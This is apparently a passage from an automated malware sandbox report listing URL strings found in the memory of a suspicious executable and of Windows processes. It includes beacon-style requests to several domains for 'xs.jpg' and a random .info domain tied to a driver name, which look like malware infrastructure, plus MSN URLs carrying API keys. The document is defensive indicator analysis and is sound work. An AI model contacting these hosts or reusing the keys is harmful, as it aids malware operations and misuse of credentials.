        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880Z
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?73b8b348=-2059992880q
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?7591ea6=1109529558
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?8660f531=856140168ON
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132170
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132P
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132W?=
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132_
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132l
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132urity
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9d5d58f=660035132x
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9de48b26=-1928797098
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?9de48b26=-1928797098j
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?a524d199=690392264
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ae2be931=352810790
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?ba897d5a=-1165394598
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c46dd74c=-702204804
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c46dd74c=-702204804f
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?c8127ba=419581812
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?da340bf8=1758474208u
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?e84f9f45=-397435067
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?e84f9f45=-397435067e
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f619fdc=1806393092o
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f6512876=-1299627088
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?f6512876=-1299627088L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fc1317fd=-526860312
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fd1cebdb=-48436261
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://amsamex.com/xs.jpg?fd1cebdb=-48436261L
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?10da53c=53014452
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1208a479=1210225124
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1a33e4b=109902124
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?1ad41f3e=450109246
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?2c73ccc=186446640
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apple-pie.in/images/xs.jpg?5e41367=98833255
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B962633000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/Windows.Web.Http
        Source: SearchApp.exe, 0000001F.00000000.1537379302.000001CE1889E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
        Source: explorer.exe, 0000001B.00000002.3974617181.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1478266221.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001B.00000000.1469625863.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000001E.00000000.1528658066.0000023D73980000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000020.00000000.1645898785.000001EF6E6E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3842902328.00000000046D3000.00000004.10000000.00040000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.0000000002408000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3812391802.00000000039CC000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281486806.0000000000870000.00000004.00000020.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3790167124.000000000240E000.00000004.00000010.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmp, #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000003.1281602249.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.3814434317.0000000004A33000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17b6de9=198930248
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17f3b14d=-1883887666
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?17f3b14d=-1883887666$
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?20ae1e9=239873375
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?2dce9fa=384258000
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?3c84448=190368984c.dz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?475ad88=299284000c
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3777235746.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5e49a2=6179234v
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?5eb9eca6=-1116481204i/Y
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?676dbbc=108452796S
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-21452771243
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?8021ab3c=-2145277124Qe
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?80947de5=58389342
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9055f4a9=-1873414999
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9055f4a9=-1873414999V
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?91387e43=-1405817186
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?939b7bae=155214274
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?9ad6cfae=1905085726
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058lBUz
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?b3df36a1=1740533058lEU
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?d090ea93=-795809133
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?e6979d=105784651
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3872598271.0000000006AF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.careerdesk.org/images/xs.jpg?f260cef5=-685609761
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/
        Source: #U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe, 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
        Source: svchost.exe, 00000017.00000000.1448703060.000001697A613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.com
        Source: svchost.exe, 00000017.00000000.1448703060.000001697A613000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comdS
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://%s.xboxlive.comint
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://accounts.xboxlive.com/codeOfConduct/
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com
        Source: explorer.exe, 0000001B.00000000.1482824632.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2293165397.000000000BD22000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.comy
        Source: SearchApp.exe, 0000001F.00000000.1550970635.000001D619BC4000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1537183584.000001CE18838000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1536602109.000001CE13F7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
        Source: SearchApp.exe, 0000001F.00000000.1543708623.000001CE1975E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1537183584.000001CE18838000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
        Source: SearchApp.exe, 0000001F.00000000.1537898194.000001CE189A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
        Source: SearchApp.exe, 0000001F.00000000.1554869750.000001D61A56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/fixsearch
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSJM
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSZM
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSp
        Source: SearchApp.exe, 0000001F.00000000.1606832993.000001D62E157000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/rT
        Source: explorer.exe, 0000001B.00000000.1479087951.000000000862F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?z$
        Source: explorer.exe, 0000001B.00000000.1479087951.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.0000000008796000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/~T
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3823441121.0000000002F10000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 0000001B.00000002.4124666902.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.0000000008685000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1534304815.000001CE12248000.00000004.00000001.00020000.00000000.sdmp, TextInputHost.exe, 00000026.00000000.1688581181.000001E34D144000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com
        Source: svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450248147.000001697A641000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
